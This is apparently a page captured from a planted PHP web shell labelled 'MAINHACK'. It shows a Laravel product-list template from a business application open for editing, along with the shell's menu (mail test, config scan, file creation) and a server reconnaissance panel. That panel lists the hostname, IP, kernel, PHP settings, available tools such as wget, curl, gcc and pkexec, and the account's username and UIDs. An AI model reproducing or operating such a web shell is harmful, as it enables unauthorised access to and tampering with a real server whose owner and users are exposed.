[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: product_list.blade.php
@php $colspan = 15; $custom_labels = json_decode(session('business.custom_labels'), true); @endphp <table class="table table-bordered table-striped ajax_view hide-footer" id="product_table"> <thead> <tr> <th><input type="checkbox" id="select-all-row" data-table-id="product_table"></th> <th class="tw-w-full">{{__('lang_v1.product_image')}} </th> <th>@lang('messages.action')</th> <th>@lang('sale.product')</th> <th>@lang('purchase.business_location') @show_tooltip(__('lang_v1.product_business_location_tooltip'))</th> @can('view_purchase_price') @php $colspan++; @endphp <th>@lang('lang_v1.unit_perchase_price')</th> @endcan @can('access_default_selling_price') @php $colspan++; @endphp <th>@lang('lang_v1.selling_price')</th> @endcan <th>@lang('report.current_stock')</th> <th>@lang('product.product_type')</th> <th>@lang('product.category')</th> <th>@lang('product.brand')</th> <th>@lang('product.tax')</th> <th>@lang('product.sku')</th> <th id="cf_1">{{ $custom_labels['product']['custom_field_1'] ?? '' }}</th> <th id="cf_2">{{ $custom_labels['product']['custom_field_2'] ?? '' }}</th> <th id="cf_3">{{ $custom_labels['product']['custom_field_3'] ?? '' }}</th> <th id="cf_4">{{ $custom_labels['product']['custom_field_4'] ?? '' }}</th> <th id="cf_5">{{ $custom_labels['product']['custom_field_5'] ?? '' }}</th> <th id="cf_6">{{ $custom_labels['product']['custom_field_6'] ?? '' }}</th> <th id="cf_7">{{ $custom_labels['product']['custom_field_7'] ?? '' }}</th> </tr> </thead> <tfoot> <tr> <td colspan="{{$colspan}}"> <div style="display: flex; width: 100%;"> @can('product.delete') {!! Form::open(['url' => action([\App\Http\Controllers\ProductController::class, 'massDestroy']), 'method' => 'post', 'id' => 'mass_delete_form' ]) !!} {!! Form::hidden('selected_rows', null, ['id' => 'selected_rows']); !!} {!! Form::submit(__('lang_v1.delete_selected'), array('class' => 'tw-dw-btn tw-dw-btn-outline tw-dw-btn-xs tw-dw-btn-error', 'id' => 'delete-selected')) !!} {!! Form::close() !!} @endcan @can('product.update') @if(config('constants.enable_product_bulk_edit')) {!! Form::open(['url' => action([\App\Http\Controllers\ProductController::class, 'bulkEdit']), 'method' => 'post', 'id' => 'bulk_edit_form' ]) !!} {!! Form::hidden('selected_products', null, ['id' => 'selected_products_for_edit']); !!} <button type="submit" class="tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-primary" id="edit-selected"> <i class="fa fa-edit"></i>{{__('lang_v1.bulk_edit')}}</button> {!! Form::close() !!} @endif <button type="button" class="tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-accent update_product_location" data-type="add">@lang('lang_v1.add_to_location')</button> <button type="button" class="tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-neutral update_product_location" data-type="remove">@lang('lang_v1.remove_from_location')</button> @endcan {!! Form::open(['url' => action([\App\Http\Controllers\ProductController::class, 'massDeactivate']), 'method' => 'post', 'id' => 'mass_deactivate_form' ]) !!} {!! Form::hidden('selected_products', null, ['id' => 'selected_products']); !!} {!! Form::submit(__('lang_v1.deactivate_selected'), array('class' => 'tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-warning', 'id' => 'deactivate-selected')) !!} {!! Form::close() !!} @show_tooltip(__('lang_v1.deactive_product_tooltip')) @if($is_woocommerce) <button type="button" class="tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-warning toggle_woocomerce_sync"> @lang('lang_v1.woocommerce_sync') </button> @endif </div> </td> </tr> </tfoot> </table>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285